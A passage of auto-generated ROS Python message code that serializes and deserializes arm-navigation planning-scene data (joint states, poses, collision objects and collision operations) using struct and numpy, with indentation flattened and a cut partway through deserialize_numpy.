        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      length = len(self.planning_scene_diff.collision_map.boxes)
      buff.write(_struct_I.pack(length))
      for val1 in self.planning_scene_diff.collision_map.boxes:
        _v26 = val1.center
        _x = _v26
        buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
        _v27 = val1.extents
        _x = _v27
        buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
        _v28 = val1.axis
        _x = _v28
        buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
        buff.write(_struct_f.pack(val1.angle))
      # --- operations.collision_operations ---
      length = len(self.operations.collision_operations)
      buff.write(_struct_I.pack(length))
      for val1 in self.operations.collision_operations:
        _x = val1.object1
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        _x = val1.object2
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        _x = val1
        buff.write(_struct_di.pack(_x.penetration_distance, _x.operation))
    except struct.error as se: self._check_types(se)
    except TypeError as te: self._check_types(te)
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.planning_scene_diff is None:
self.planning_scene_diff = arm_navigation_msgs.msg.PlanningScene()
if self.operations is None:
self.operations = arm_navigation_msgs.msg.OrderedCollisionOperations()
end = 0
_x = self
start = end
end += 12
(_x.planning_scene_diff.robot_state.joint_state.header.seq, _x.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end].decode('utf-8')
else:
self.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.joint_state.name = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.robot_state.joint_state.name.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene_diff.robot_state.joint_state.position = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene_diff.robot_state.joint_state.velocity = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene_diff.robot_state.joint_state.effort = struct.unpack(pattern, str[start:end])
_x = self
start = end
end += 8
(_x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.poses = []
for i in range(0, length):
val1 = geometry_msgs.msg.Pose()
_v29 = val1.position
_x = _v29
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v30 = val1.orientation
_x = _v30
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.poses.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.fixed_frame_transforms = []
for i in range(0, length):
val1 = geometry_msgs.msg.TransformStamped()
_v31 = val1.header
start = end
end += 4
(_v31.seq,) = _struct_I.unpack(str[start:end])
_v32 = _v31.stamp
_x = _v32
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v31.frame_id = str[start:end].decode('utf-8')
else:
_v31.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.child_frame_id = str[start:end].decode('utf-8')
else:
val1.child_frame_id = str[start:end]
_v33 = val1.transform
_v34 = _v33.translation
_x = _v34
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v35 = _v33.rotation
_x = _v35
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
self.planning_scene_diff.fixed_frame_transforms.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.allowed_collision_matrix.link_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.allowed_collision_matrix.link_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.allowed_collision_matrix.entries = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AllowedCollisionEntry()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sB'%length
start = end
end += struct.calcsize(pattern)
val1.enabled = struct.unpack(pattern, str[start:end])
val1.enabled = map(bool, val1.enabled)
self.planning_scene_diff.allowed_collision_matrix.entries.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.allowed_contacts = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AllowedContactSpecification()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8')
else:
val1.name = str[start:end]
_v36 = val1.shape
start = end
end += 1
(_v36.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
_v36.dimensions = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
_v36.triangles = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v36.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v36.vertices.append(val3)
_v37 = val1.pose_stamped
_v38 = _v37.header
start = end
end += 4
(_v38.seq,) = _struct_I.unpack(str[start:end])
_v39 = _v38.stamp
_x = _v39
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v38.frame_id = str[start:end].decode('utf-8')
else:
_v38.frame_id = str[start:end]
_v40 = _v37.pose
_v41 = _v40.position
_x = _v41
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v42 = _v40.orientation
_x = _v42
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.link_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8')
else:
val2 = str[start:end]
val1.link_names.append(val2)
start = end
end += 8
(val1.penetration_depth,) = _struct_d.unpack(str[start:end])
self.planning_scene_diff.allowed_contacts.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.link_padding = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.LinkPadding()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.link_name = str[start:end].decode('utf-8')
else:
val1.link_name = str[start:end]
start = end
end += 8
(val1.padding,) = _struct_d.unpack(str[start:end])
self.planning_scene_diff.link_padding.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.collision_objects = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.CollisionObject()
_v43 = val1.header
start = end
end += 4
(_v43.seq,) = _struct_I.unpack(str[start:end])
_v44 = _v43.stamp
_x = _v44
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v43.frame_id = str[start:end].decode('utf-8')
else:
_v43.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.id = str[start:end].decode('utf-8')
else:
val1.id = str[start:end]
start = end
end += 4
(val1.padding,) = _struct_f.unpack(str[start:end])
_v45 = val1.operation
start = end
end += 1
(_v45.operation,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.shapes = []
for i in range(0, length):
val2 = arm_navigation_msgs.msg.Shape()
start = end
end += 1
(val2.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val2.dimensions = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
val2.triangles = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
val2.vertices.append(val3)
val1.shapes.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.poses = []
for i in range(0, length):
val2 = geometry_msgs.msg.Pose()
_v46 = val2.position
_x = _v46
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v47 = val2.orientation
_x = _v47
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
val1.poses.append(val2)
self.planning_scene_diff.collision_objects.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.attached_collision_objects = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AttachedCollisionObject()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.link_name = str[start:end].decode('utf-8')
else:
val1.link_name = str[start:end]
_v48 = val1.object
_v49 = _v48.header
start = end
end += 4
(_v49.seq,) = _struct_I.unpack(str[start:end])
_v50 = _v49.stamp
_x = _v50
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v49.frame_id = str[start:end].decode('utf-8')
else:
_v49.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v48.id = str[start:end].decode('utf-8')
else:
_v48.id = str[start:end]
start = end
end += 4
(_v48.padding,) = _struct_f.unpack(str[start:end])
_v51 = _v48.operation
start = end
end += 1
(_v51.operation,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v48.shapes = []
for i in range(0, length):
val3 = arm_navigation_msgs.msg.Shape()
start = end
end += 1
(val3.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val3.dimensions = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
val3.triangles = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val3.vertices = []
for i in range(0, length):
val4 = geometry_msgs.msg.Point()
_x = val4
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
val3.vertices.append(val4)
_v48.shapes.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v48.poses = []
for i in range(0, length):
val3 = geometry_msgs.msg.Pose()
_v52 = val3.position
_x = _v52
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v53 = val3.orientation
_x = _v53
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
_v48.poses.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.touch_links = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8')
else:
val2 = str[start:end]
val1.touch_links.append(val2)
self.planning_scene_diff.attached_collision_objects.append(val1)
_x = self
start = end
end += 12
(_x.planning_scene_diff.collision_map.header.seq, _x.planning_scene_diff.collision_map.header.stamp.secs, _x.planning_scene_diff.collision_map.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.planning_scene_diff.collision_map.header.frame_id = str[start:end].decode('utf-8')
else:
self.planning_scene_diff.collision_map.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.collision_map.boxes = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.OrientedBoundingBox()
_v54 = val1.center
_x = _v54
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
_v55 = val1.extents
_x = _v55
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
_v56 = val1.axis
_x = _v56
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
start = end
end += 4
(val1.angle,) = _struct_f.unpack(str[start:end])
self.planning_scene_diff.collision_map.boxes.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.operations.collision_operations = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.CollisionOperation()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.object1 = str[start:end].decode('utf-8')
else:
val1.object1 = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.object2 = str[start:end].decode('utf-8')
else:
val1.object2 = str[start:end]
_x = val1
start = end
end += 12
(_x.penetration_distance, _x.operation,) = _struct_di.unpack(str[start:end])
self.operations.collision_operations.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_struct_3I.pack(_x.planning_scene_diff.robot_state.joint_state.header.seq, _x.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs))
_x = self.planning_scene_diff.robot_state.joint_state.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.planning_scene_diff.robot_state.joint_state.name)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.robot_state.joint_state.name:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene_diff.robot_state.joint_state.position)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(self.planning_scene_diff.robot_state.joint_state.position.tostring())
length = len(self.planning_scene_diff.robot_state.joint_state.velocity)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(self.planning_scene_diff.robot_state.joint_state.velocity.tostring())
length = len(self.planning_scene_diff.robot_state.joint_state.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(self.planning_scene_diff.robot_state.joint_state.effort.tostring())
_x = self
buff.write(_struct_2I.pack(_x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.nsecs))
length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.poses)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.poses:
_v57 = val1.position
_x = _v57
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v58 = val1.orientation
_x = _v58
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.planning_scene_diff.fixed_frame_transforms)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.fixed_frame_transforms:
_v59 = val1.header
buff.write(_struct_I.pack(_v59.seq))
_v60 = _v59.stamp
_x = _v60
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v59.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1.child_frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v61 = val1.transform
_v62 = _v61.translation
_x = _v62
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v63 = _v61.rotation
_x = _v63
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.planning_scene_diff.allowed_collision_matrix.link_names)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.allowed_collision_matrix.link_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene_diff.allowed_collision_matrix.entries)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.allowed_collision_matrix.entries:
length = len(val1.enabled)
buff.write(_struct_I.pack(length))
pattern = '<%sB'%length
buff.write(val1.enabled.tostring())
length = len(self.planning_scene_diff.allowed_contacts)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.allowed_contacts:
_x = val1.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v64 = val1.shape
buff.write(_struct_b.pack(_v64.type))
length = len(_v64.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(_v64.dimensions.tostring())
length = len(_v64.triangles)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(_v64.triangles.tostring())
length = len(_v64.vertices)
buff.write(_struct_I.pack(length))
for val3 in _v64.vertices:
_x = val3
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v65 = val1.pose_stamped
_v66 = _v65.header
buff.write(_struct_I.pack(_v66.seq))
_v67 = _v66.stamp
_x = _v67
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v66.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v68 = _v65.pose
_v69 = _v68.position
_x = _v69
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v70 = _v68.orientation
_x = _v70
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(val1.link_names)
buff.write(_struct_I.pack(length))
for val2 in val1.link_names:
length = len(val2)
if python3 or type(val2) == unicode:
val2 = val2.encode('utf-8')
length = len(val2)
buff.write(struct.pack('<I%ss'%length, length, val2))
buff.write(_struct_d.pack(val1.penetration_depth))
length = len(self.planning_scene_diff.link_padding)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.link_padding:
_x = val1.link_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_d.pack(val1.padding))
length = len(self.planning_scene_diff.collision_objects)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.collision_objects:
_v71 = val1.header
buff.write(_struct_I.pack(_v71.seq))
_v72 = _v71.stamp
_x = _v72
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v71.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_f.pack(val1.padding))
_v73 = val1.operation
buff.write(_struct_b.pack(_v73.operation))
length = len(val1.shapes)
buff.write(_struct_I.pack(length))
for val2 in val1.shapes:
buff.write(_struct_b.pack(val2.type))
length = len(val2.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val2.dimensions.tostring())
length = len(val2.triangles)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(val2.triangles.tostring())
length = len(val2.vertices)
buff.write(_struct_I.pack(length))
for val3 in val2.vertices:
_x = val3
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
length = len(val1.poses)
buff.write(_struct_I.pack(length))
for val2 in val1.poses:
_v74 = val2.position
_x = _v74
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v75 = val2.orientation
_x = _v75
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.planning_scene_diff.attached_collision_objects)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.attached_collision_objects:
_x = val1.link_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v76 = val1.object
_v77 = _v76.header
buff.write(_struct_I.pack(_v77.seq))
_v78 = _v77.stamp
_x = _v78
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v77.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = _v76.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_f.pack(_v76.padding))
_v79 = _v76.operation
buff.write(_struct_b.pack(_v79.operation))
length = len(_v76.shapes)
buff.write(_struct_I.pack(length))
for val3 in _v76.shapes:
buff.write(_struct_b.pack(val3.type))
length = len(val3.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val3.dimensions.tostring())
length = len(val3.triangles)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(val3.triangles.tostring())
length = len(val3.vertices)
buff.write(_struct_I.pack(length))
for val4 in val3.vertices:
_x = val4
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
length = len(_v76.poses)
buff.write(_struct_I.pack(length))
for val3 in _v76.poses:
_v80 = val3.position
_x = _v80
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v81 = val3.orientation
_x = _v81
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(val1.touch_links)
buff.write(_struct_I.pack(length))
for val2 in val1.touch_links:
length = len(val2)
if python3 or type(val2) == unicode:
val2 = val2.encode('utf-8')
length = len(val2)
buff.write(struct.pack('<I%ss'%length, length, val2))
_x = self
buff.write(_struct_3I.pack(_x.planning_scene_diff.collision_map.header.seq, _x.planning_scene_diff.collision_map.header.stamp.secs, _x.planning_scene_diff.collision_map.header.stamp.nsecs))
_x = self.planning_scene_diff.collision_map.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.planning_scene_diff.collision_map.boxes)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.collision_map.boxes:
_v82 = val1.center
_x = _v82
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
_v83 = val1.extents
_x = _v83
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
_v84 = val1.axis
_x = _v84
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
buff.write(_struct_f.pack(val1.angle))
length = len(self.operations.collision_operations)
buff.write(_struct_I.pack(length))
for val1 in self.operations.collision_operations:
_x = val1.object1
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1.object2
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1
buff.write(_struct_di.pack(_x.penetration_distance, _x.operation))
except struct.error as se: self._check_types(se)
except TypeError as te: self._check_types(te)
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.planning_scene_diff is None:
self.planning_scene_diff = arm_navigation_msgs.msg.PlanningScene()
if self.operations is None:
self.operations = arm_navigation_msgs.msg.OrderedCollisionOperations()
end = 0
_x = self
start = end
end += 12
(_x.planning_scene_diff.robot_state.joint_state.header.seq, _x.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end].decode('utf-8')
else:
self.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.joint_state.name = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.robot_state.joint_state.name.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene_diff.robot_state.joint_state.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene_diff.robot_state.joint_state.velocity = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene_diff.robot_state.joint_state.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_x = self
start = end
end += 8
(_x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
